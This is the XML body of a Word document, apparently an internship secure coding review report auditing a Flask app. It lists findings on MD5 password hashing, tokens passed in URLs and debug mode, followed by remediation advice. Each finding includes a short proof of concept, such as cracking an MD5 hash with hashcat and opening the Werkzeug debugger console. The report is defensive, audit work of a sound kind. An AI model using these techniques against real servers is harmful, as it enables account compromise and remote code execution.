        <w:t xml:space="preserve">31–33</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Passwords are stored as MD5 hashes. MD5 is a fast, broken algorithm not designed for password storage. It is trivially crackable using rainbow tables or GPU brute-force.</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All user passwords recoverable from a database dump within seconds using public tools.</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echo -n 'admin123' | md5sum → 0192023a7bbd73250516f069df18b500 (cracked instantly by hashcat)</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Use Werkzeug's generate_password_hash() / check_password_hash() (bcrypt/scrypt under the hood). Never use MD5, SHA-1, or unsalted SHA-256 for passwords.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">V-08 — Sensitive Data Exposure in URL</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F0C419" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> MEDIUM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CWE-598</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    Lines: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">116–121</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The /transfer endpoint accepts a secret token and amount via GET parameters. URLs are logged by web servers, proxies, and appear in browser history and Referer headers.</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Token leakage via server logs, proxy logs, browser history, and HTTP Referer headers.</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GET /transfer?token=abc123secret&amp;amount=5000 (token visible in all logs)</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Move sensitive parameters to POST body (request.get_json()). Enable HTTPS. Set Referrer-Policy: no-referrer response header.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">V-09 — Debug Mode Enabled in Production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="F0C419" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> MEDIUM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    CWE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-215</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    Lines: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">129</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Description:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Flask is started with debug=True and host='0.0.0.0'. Debug mode enables the Werkzeug interactive debugger, which provides an in-browser Python REPL accessible without authentication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Full Remote Code Execution via the browser debugger. Sensitive tracebacks expose code and config.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Visit any error URL with debug=True active → Werkzeug shows interactive Python console</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="27AE60"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Set debug=False in production. Control via environment variable. Bind to 127.0.0.1, not 0.0.0.0. Use gunicorn or uWSGI for production serving.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E6DA4" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Recommendations &amp; Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The following secure coding practices should be adopted across all future development:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Input Validation &amp; Output Encoding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Validate all user input against strict allowlists before use</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HTML-encode all dynamic content rendered into web pages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use parameterised queries for every database interaction</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication &amp; Session Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hash passwords with bcrypt, scrypt, or Argon2 — never MD5 or SHA-1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Generate session secrets cryptographically (secrets.token_hex)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Set session cookies with HttpOnly, Secure, and SameSite=Lax flags</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enforce session expiry and regenerate session IDs after login</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Access Control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enforce authorization server-side on every request — never trust the client</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply principle of least privilege to all roles and DB accounts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Log and alert on access control failures</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Dependency &amp; Configuration Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Never run with debug=True outside a sandboxed development environment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Store all secrets in environment variables or a secrets manager (e.g., AWS Secrets Manager)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Pin dependency versions and audit regularly with pip-audit or safety</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Serialization &amp; File Handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reject pickle, marshal, or yaml.load for any untrusted data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Validate file type, size, and content before processing uploads</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E6DA4" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Tools &amp; References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools Used:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Manual Code Review — primary analysis method</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Bandit (pip install bandit) — Python static analysis for common security issues</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">grep / ripgrep — pattern search for known anti-patterns</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">References:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10 (2021) — https://owasp.org/Top10/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE/SANS Top 25 — https://cwe.mitre.org/top25/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Secure Coding Practices — https://owasp.org/www-project-secure-coding-practices-quick-reference-guide/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Flask Security Guide — https://flask.palletsprojects.com/en/latest/security/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Werkzeug Password Hashing — https://werkzeug.palletsprojects.com/en/latest/utils/</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E6DA4" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The audit of vulnerable_app.py revealed nine security vulnerabilities, three of which are CRITICAL severity and could result in complete server compromise. All findings have been fully remediated in the accompanying secure_app.py with inline code comments explaining each fix. This exercise demonstrates the importance of integrating security reviews into the development lifecycle — vulnerabilities that take minutes to introduce can take hours to recover from in production. Future development should incorporate automated static analysis (Bandit), dependency audits, and periodic manual code reviews.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555555"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">CodeAlpha Internship — Secure Coding Review Report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2026-06-12T22:26:46.450Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-12T22:26:46.450Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>